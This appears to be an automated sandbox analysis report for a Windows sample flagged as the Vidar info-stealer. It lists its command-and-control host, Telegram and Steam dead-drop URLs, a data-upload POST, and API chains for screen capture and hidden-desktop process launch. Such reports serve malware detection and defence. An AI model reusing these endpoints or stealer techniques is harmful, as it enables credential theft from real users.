          Source: Joe Sandbox ViewIP Address: 149.154.167.99 149.154.167.99
          Source: Joe Sandbox ViewIP Address: 149.154.167.99 149.154.167.99
          Source: Joe Sandbox ViewASN Name: HETZNER-ASDE HETZNER-ASDE
          Source: Joe Sandbox ViewJA3 fingerprint: 28a2c9bd18a11de089ef85a160da29e4
          Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
          Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
          Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
          Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
          Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
          Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
          Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.27
          Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.27
          Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
          Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.27
          Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.27
          Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.27
          Source: unknownTCP traffic detected without corresponding DNS query: 131.253.33.254
          Source: unknownTCP traffic detected without corresponding DNS query: 131.253.33.254
          Source: unknownTCP traffic detected without corresponding DNS query: 131.253.33.254
          Source: unknownTCP traffic detected without corresponding DNS query: 131.253.33.254
          Source: unknownTCP traffic detected without corresponding DNS query: 131.253.33.254
          Source: unknownTCP traffic detected without corresponding DNS query: 131.253.33.254
          Source: unknownTCP traffic detected without corresponding DNS query: 131.253.33.254
          Source: unknownTCP traffic detected without corresponding DNS query: 131.253.33.254
          Source: unknownTCP traffic detected without corresponding DNS query: 131.253.33.254
          Source: unknownTCP traffic detected without corresponding DNS query: 131.253.33.254
          Source: unknownTCP traffic detected without corresponding DNS query: 131.253.33.254
          Source: unknownTCP traffic detected without corresponding DNS query: 131.253.33.254
          Source: unknownTCP traffic detected without corresponding DNS query: 131.253.33.254
          Source: unknownTCP traffic detected without corresponding DNS query: 131.253.33.254
          Source: unknownTCP traffic detected without corresponding DNS query: 131.253.33.254
          Source: unknownTCP traffic detected without corresponding DNS query: 131.253.33.254
          Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.222
          Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.222
          Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.222
          Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.222
          Source: unknownTCP traffic detected without corresponding DNS query: 142.250.186.131
          Source: unknownTCP traffic detected without corresponding DNS query: 142.250.186.131
          Source: unknownTCP traffic detected without corresponding DNS query: 142.250.186.131
          Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.222
          Source: unknownTCP traffic detected without corresponding DNS query: 142.250.186.131
          Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.222
          Source: unknownTCP traffic detected without corresponding DNS query: 142.250.186.131
          Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.27
          Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.222
          Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.222
          Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
          Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.222
          Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.222
          Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.27
          Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.222
          Source: unknownTCP traffic detected without corresponding DNS query: 142.250.186.131
          Source: unknownTCP traffic detected without corresponding DNS query: 142.250.186.131
          Source: unknownTCP traffic detected without corresponding DNS query: 52.113.196.254
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.AdwareX-gen.20631.18363.exeCode function: 1_2_00403850 InternetOpenA,StrCmpCA,InternetConnectA,HttpOpenRequestA,InternetSetOptionA,HttpSendRequestA,HttpQueryInfoA,InternetReadFile,InternetCloseHandle,InternetCloseHandle,1_2_00403850
          Source: global trafficHTTP traffic detected: GET /l793oy HTTP/1.1Host: t.meConnection: Keep-AliveCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) Chrome/131.0.0.0 Safari/537.36 OPR/116.0.0.0Host: go.f.goldenloafuae.comConnection: Keep-AliveCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /async/newtab_ogb?hl=en-US&async=fixed:0 HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEI0qDKAQig4coBCJKhywEInP7MAQiFoM0BCL7VzgEIgNbOAQjB2M4BCMjczgEIiuDOAQiu5M4BCIvlzgE=Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /async/ddljson?async=ntp:2 HTTP/1.1Host: www.google.comConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyA2KlwBX3mkFo30om9LUFYQhpqLoa_BNhE HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEI0qDKAQig4coBCJKhywEInP7MAQiFoM0BCL7VzgEIgNbOAQjB2M4BCMjczgEIiuDOAQiu5M4BCIvlzgE=Sec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /async/newtab_promos HTTP/1.1Host: www.google.comConnection: keep-aliveSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /r/gsr1.crl HTTP/1.1Cache-Control: max-age = 3000Connection: Keep-AliveAccept: */*If-Modified-Since: Tue, 07 Jan 2025 07:28:00 GMTUser-Agent: Microsoft-CryptoAPI/10.0Host: c.pki.goog
          Source: global trafficHTTP traffic detected: GET /r/r4.crl HTTP/1.1Cache-Control: max-age = 3000Connection: Keep-AliveAccept: */*If-Modified-Since: Thu, 25 Jul 2024 14:48:00 GMTUser-Agent: Microsoft-CryptoAPI/10.0Host: c.pki.goog
          Source: global trafficDNS traffic detected: DNS query: t.me
          Source: global trafficDNS traffic detected: DNS query: go.f.goldenloafuae.com
          Source: global trafficDNS traffic detected: DNS query: www.google.com
          Source: unknownHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----n790h479zmglf3ecjectUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) Chrome/131.0.0.0 Safari/537.36 OPR/116.0.0.0Host: go.f.goldenloafuae.comContent-Length: 256Connection: Keep-AliveCache-Control: no-cache
          Source: kfuaiw.1.drString found in binary or memory: https://ac.ecosia.org?q=
          Source: SecuriteInfo.com.Win32.AdwareX-gen.20631.18363.exe, 00000001.00000002.1989565252.0000000003303000.00000004.00000020.00020000.00000000.sdmp, m7ymoh.1.drString found in binary or memory: https://bridge.lga1.admarketplace.net/ctp?version=16.0.0&key=1696332238301000001.2&ci=1696332238417.
          Source: SecuriteInfo.com.Win32.AdwareX-gen.20631.18363.exe, 00000001.00000002.1989565252.0000000003303000.00000004.00000020.00020000.00000000.sdmp, m7ymoh.1.drString found in binary or memory: https://bridge.lga1.ap01.net/ctp?version=16.0.0&key=1696332238301000001.1&ci=1696332238417.12791&cta
          Source: kfuaiw.1.drString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
          Source: SecuriteInfo.com.Win32.AdwareX-gen.20631.18363.exe, 00000001.00000002.1989813367.000000000356B000.00000004.00000020.00020000.00000000.sdmp, kfuaiw.1.drString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
          Source: SecuriteInfo.com.Win32.AdwareX-gen.20631.18363.exe, 00000001.00000002.1989813367.000000000356B000.00000004.00000020.00020000.00000000.sdmp, kfuaiw.1.drString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
          Source: SecuriteInfo.com.Win32.AdwareX-gen.20631.18363.exe, 00000001.00000002.1989565252.0000000003303000.00000004.00000020.00020000.00000000.sdmp, m7ymoh.1.drString found in binary or memory: https://contile-images.services.mozilla.com/0TegrVVRalreHILhR2WvtD_CFzj13HCDcLqqpvXSOuY.10862.jpg
          Source: SecuriteInfo.com.Win32.AdwareX-gen.20631.18363.exe, 00000001.00000002.1989565252.0000000003303000.00000004.00000020.00020000.00000000.sdmp, m7ymoh.1.drString found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
          Source: kfuaiw.1.drString found in binary or memory: https://duckduckgo.com/ac/?q=
          Source: SecuriteInfo.com.Win32.AdwareX-gen.20631.18363.exe, 00000001.00000002.1989813367.000000000356B000.00000004.00000020.00020000.00000000.sdmp, kfuaiw.1.drString found in binary or memory: https://duckduckgo.com/chrome_newtabv20
          Source: kfuaiw.1.drString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
          Source: kfuaiw.1.drString found in binary or memory: https://gemini.google.com/app?q=
          Source: SecuriteInfo.com.Win32.AdwareX-gen.20631.18363.exe, 00000001.00000002.1988758260.00000000004EB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://go.f.goldenloafuae.com
          Source: SecuriteInfo.com.Win32.AdwareX-gen.20631.18363.exe, 00000001.00000002.1988758260.00000000004C0000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.AdwareX-gen.20631.18363.exe, 00000001.00000003.1415731105.000000000051F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.AdwareX-gen.20631.18363.exe, 00000001.00000002.1989565252.000000000332B000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.AdwareX-gen.20631.18363.exe, 00000001.00000003.1320074974.00000000004FE000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.AdwareX-gen.20631.18363.exe, 00000001.00000003.1385868320.000000000051F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.AdwareX-gen.20631.18363.exe, 00000001.00000003.1415703142.00000000004FE000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.AdwareX-gen.20631.18363.exe, 00000001.00000003.1349855443.00000000004FE000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.AdwareX-gen.20631.18363.exe, 00000001.00000003.1385816045.00000000004FE000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.AdwareX-gen.20631.18363.exe, 00000001.00000003.1440465464.000000000051F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.AdwareX-gen.20631.18363.exe, 00000001.00000002.1988758260.00000000004EB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://go.f.goldenloafuae.com/
          Source: SecuriteInfo.com.Win32.AdwareX-gen.20631.18363.exe, 00000001.00000003.1320074974.00000000004FE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://go.f.goldenloafuae.com/%
          Source: SecuriteInfo.com.Win32.AdwareX-gen.20631.18363.exe, 00000001.00000003.1320074974.00000000004FE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://go.f.goldenloafuae.com/5
          Source: SecuriteInfo.com.Win32.AdwareX-gen.20631.18363.exe, 00000001.00000003.1415731105.000000000051F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.AdwareX-gen.20631.18363.exe, 00000001.00000003.1415703142.00000000004FE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://go.f.goldenloafuae.com/N
          Source: SecuriteInfo.com.Win32.AdwareX-gen.20631.18363.exe, 00000001.00000003.1440465464.000000000051F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://go.f.goldenloafuae.com/T
          Source: SecuriteInfo.com.Win32.AdwareX-gen.20631.18363.exe, 00000001.00000003.1415731105.000000000051F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.AdwareX-gen.20631.18363.exe, 00000001.00000003.1385868320.000000000051F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.AdwareX-gen.20631.18363.exe, 00000001.00000003.1415703142.00000000004FE000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.AdwareX-gen.20631.18363.exe, 00000001.00000003.1385816045.00000000004FE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://go.f.goldenloafuae.com/d
          Source: SecuriteInfo.com.Win32.AdwareX-gen.20631.18363.exe, 00000001.00000003.1440465464.000000000051F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://go.f.goldenloafuae.com/g
          Source: SecuriteInfo.com.Win32.AdwareX-gen.20631.18363.exe, 00000001.00000002.1988758260.00000000004EB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://go.f.goldenloafuae.com/ozilla
          Source: SecuriteInfo.com.Win32.AdwareX-gen.20631.18363.exe, 00000001.00000003.1320074974.00000000004FE000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.AdwareX-gen.20631.18363.exe, 00000001.00000003.1349855443.00000000004FE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://go.f.goldenloafuae.com/t
          Source: SecuriteInfo.com.Win32.AdwareX-gen.20631.18363.exe, 00000001.00000003.1415731105.000000000051F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.AdwareX-gen.20631.18363.exe, 00000001.00000003.1415703142.00000000004FE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://go.f.goldenloafuae.com/z
          Source: SecuriteInfo.com.Win32.AdwareX-gen.20631.18363.exe, 00000001.00000003.1349855443.00000000004FE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://go.f.goldenloafuae.com5
          Source: SecuriteInfo.com.Win32.AdwareX-gen.20631.18363.exe, 00000001.00000003.1320074974.00000000004FE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://go.f.goldenloafuae.comV
          Source: SecuriteInfo.com.Win32.AdwareX-gen.20631.18363.exe, 00000001.00000003.1320074974.00000000004FE000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.AdwareX-gen.20631.18363.exe, 00000001.00000003.1349855443.00000000004FE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://go.f.goldenloafuae.comX
          Source: SecuriteInfo.com.Win32.AdwareX-gen.20631.18363.exe, 00000001.00000003.1440465464.000000000051F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://go.f.goldenloafuae.comi
          Source: m7ymoh.1.drString found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4QqmfZfYfQfafZbXfpbWfpbX7ReNxR3UIG8zInwYIFIVs9eYi
          Source: SecuriteInfo.com.Win32.AdwareX-gen.20631.18363.exeString found in binary or memory: https://steamcommunity.com/profiles/76561199829660832
          Source: SecuriteInfo.com.Win32.AdwareX-gen.20631.18363.exeString found in binary or memory: https://steamcommunity.com/profiles/76561199829660832ir7amMozilla/5.0
          Source: SecuriteInfo.com.Win32.AdwareX-gen.20631.18363.exe, 00000001.00000002.1990989469.0000000003BC1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
          Source: SecuriteInfo.com.Win32.AdwareX-gen.20631.18363.exe, 00000001.00000002.1990989469.0000000003BC1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
          Source: SecuriteInfo.com.Win32.AdwareX-gen.20631.18363.exe, 00000001.00000002.1988758260.00000000004A9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t.me/
          Source: SecuriteInfo.com.Win32.AdwareX-gen.20631.18363.exeString found in binary or memory: https://t.me/l793oy
          Source: SecuriteInfo.com.Win32.AdwareX-gen.20631.18363.exe, 00000001.00000002.1988758260.000000000047E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t.me/l793oyE
          Source: SecuriteInfo.com.Win32.AdwareX-gen.20631.18363.exe, 00000001.00000002.1988758260.000000000047E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t.me/l793oy_
          Source: SecuriteInfo.com.Win32.AdwareX-gen.20631.18363.exeString found in binary or memory: https://t.me/l793oyir7amMozilla/5.0
          Source: SecuriteInfo.com.Win32.AdwareX-gen.20631.18363.exe, 00000001.00000003.1252648727.0000000000502000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://web.telegram.org
          Source: SecuriteInfo.com.Win32.AdwareX-gen.20631.18363.exe, 00000001.00000002.1989565252.0000000003303000.00000004.00000020.00020000.00000000.sdmp, m7ymoh.1.drString found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_7548d4575af019e4c148ccf1a78112802e66a0816a72fc94
          Source: SecuriteInfo.com.Win32.AdwareX-gen.20631.18363.exe, 00000001.00000002.1989813367.000000000356B000.00000004.00000020.00020000.00000000.sdmp, kfuaiw.1.drString found in binary or memory: https://www.ecosia.org/newtab/v20
          Source: SecuriteInfo.com.Win32.AdwareX-gen.20631.18363.exe, 00000001.00000002.1989565252.0000000003303000.00000004.00000020.00020000.00000000.sdmp, m7ymoh.1.drString found in binary or memory: https://www.expedia.com/?locale=en_US&siteid=1&semcid=US.UB.ADMARKETPLACE.GT-C-EN.HOTEL&SEMDTL=a1219
          Source: SecuriteInfo.com.Win32.AdwareX-gen.20631.18363.exe, 00000001.00000002.1989813367.000000000356B000.00000004.00000020.00020000.00000000.sdmp, kfuaiw.1.drString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_alldp.ico
          Source: SecuriteInfo.com.Win32.AdwareX-gen.20631.18363.exe, 00000001.00000002.1990989469.0000000003BC1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.VsJpOAWrHqB2
          Source: SecuriteInfo.com.Win32.AdwareX-gen.20631.18363.exe, 00000001.00000002.1990989469.0000000003BC1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.n0g9CLHwD9nR
          Source: SecuriteInfo.com.Win32.AdwareX-gen.20631.18363.exe, 00000001.00000002.1990989469.0000000003BC1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
          Source: SecuriteInfo.com.Win32.AdwareX-gen.20631.18363.exe, 00000001.00000002.1990989469.0000000003BC1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
          Source: SecuriteInfo.com.Win32.AdwareX-gen.20631.18363.exe, 00000001.00000002.1990989469.0000000003BC1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
          Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
          Source: unknownNetwork traffic detected: HTTP traffic on port 49708 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49710 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
          Source: unknownNetwork traffic detected: HTTP traffic on port 49727 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49762 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49720 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49717 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
          Source: unknownNetwork traffic detected: HTTP traffic on port 49759 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
          Source: unknownNetwork traffic detected: HTTP traffic on port 49753 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
          Source: unknownNetwork traffic detected: HTTP traffic on port 49671 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49724 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49728 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49763 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49729
          Source: unknownNetwork traffic detected: HTTP traffic on port 49752 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49728
          Source: unknownNetwork traffic detected: HTTP traffic on port 49714 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49727
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49726
          Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49725
          Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49724
          Source: unknownNetwork traffic detected: HTTP traffic on port 49756 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49722
          Source: unknownNetwork traffic detected: HTTP traffic on port 49758 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49720
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49764
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49763
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49762
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49761
          Source: unknownNetwork traffic detected: HTTP traffic on port 49678 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49760
          Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49729 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49760 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49764 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49722 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49718
          Source: unknownNetwork traffic detected: HTTP traffic on port 49751 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49717
          Source: unknownNetwork traffic detected: HTTP traffic on port 49680 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49759
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49714
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49758
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49757
          Source: unknownNetwork traffic detected: HTTP traffic on port 49755 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49756
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49755
          Source: unknownNetwork traffic detected: HTTP traffic on port 49757 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49710
          Source: unknownNetwork traffic detected: HTTP traffic on port 49709 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49754
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49753
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49752
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49751
          Source: unknownNetwork traffic detected: HTTP traffic on port 49726 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49761 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49709
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49708
          Source: unknownNetwork traffic detected: HTTP traffic on port 49754 -> 443
          Source: unknownHTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.4:49710 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 95.217.27.252:443 -> 192.168.2.4:49714 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 95.217.27.252:443 -> 192.168.2.4:49717 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 95.217.27.252:443 -> 192.168.2.4:49718 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 204.79.197.222:443 -> 192.168.2.4:49720 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 95.217.27.252:443 -> 192.168.2.4:49725 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 95.217.27.252:443 -> 192.168.2.4:49726 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 95.217.27.252:443 -> 192.168.2.4:49727 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 95.217.27.252:443 -> 192.168.2.4:49728 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 95.217.27.252:443 -> 192.168.2.4:49729 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 95.217.27.252:443 -> 192.168.2.4:49755 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 95.217.27.252:443 -> 192.168.2.4:49756 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 95.217.27.252:443 -> 192.168.2.4:49757 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 95.217.27.252:443 -> 192.168.2.4:49760 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 95.217.27.252:443 -> 192.168.2.4:49762 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 95.217.27.252:443 -> 192.168.2.4:49764 version: TLS 1.2
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.AdwareX-gen.20631.18363.exeCode function: 1_2_00410A90 CreateStreamOnHGlobal,GetDesktopWindow,GetWindowRect,GetDC,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,malloc,StrCmpCW,GetHGlobalFromStream,GlobalLock,GlobalSize,SelectObject,DeleteObject,DeleteObject,DeleteObject,ReleaseDC,CloseWindow,1_2_00410A90
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.AdwareX-gen.20631.18363.exeCode function: 1_2_00406480 memcpy,OpenDesktopA,CreateDesktopA,lstrcpyA,CreateProcessA,Sleep,CloseDesktop,1_2_00406480

          System Summary

          barindex
          Malicious sample detected (through community Yara rule)
          Source: SecuriteInfo.com.Win32.AdwareX-gen.20631.18363.exe, type: SAMPLEMatched rule: Finds Vidar samples based on the specific strings Author: Sekoia.io
          Source: 1.2.SecuriteInfo.com.Win32.AdwareX-gen.20631.18363.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Finds Vidar samples based on the specific strings Author: Sekoia.io
          Source: 1.0.SecuriteInfo.com.Win32.AdwareX-gen.20631.18363.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Finds Vidar samples based on the specific strings Author: Sekoia.io
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.AdwareX-gen.20631.18363.exeCode function: 1_2_00404A201_2_00404A20
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.AdwareX-gen.20631.18363.exeCode function: 1_2_004186301_2_00418630
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.AdwareX-gen.20631.18363.exeCode function: 1_2_0041B7701_2_0041B770
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.AdwareX-gen.20631.18363.exeCode function: 1_2_0041B3001_2_0041B300
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.AdwareX-gen.20631.18363.exeCode function: 1_2_0041C1001_2_0041C100
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.AdwareX-gen.20631.18363.exeCode function: 1_2_004193D01_2_004193D0
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.AdwareX-gen.20631.18363.exeCode function: 1_2_0041A7D01_2_0041A7D0
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.AdwareX-gen.20631.18363.exeCode function: String function: 00410D00 appears 42 times
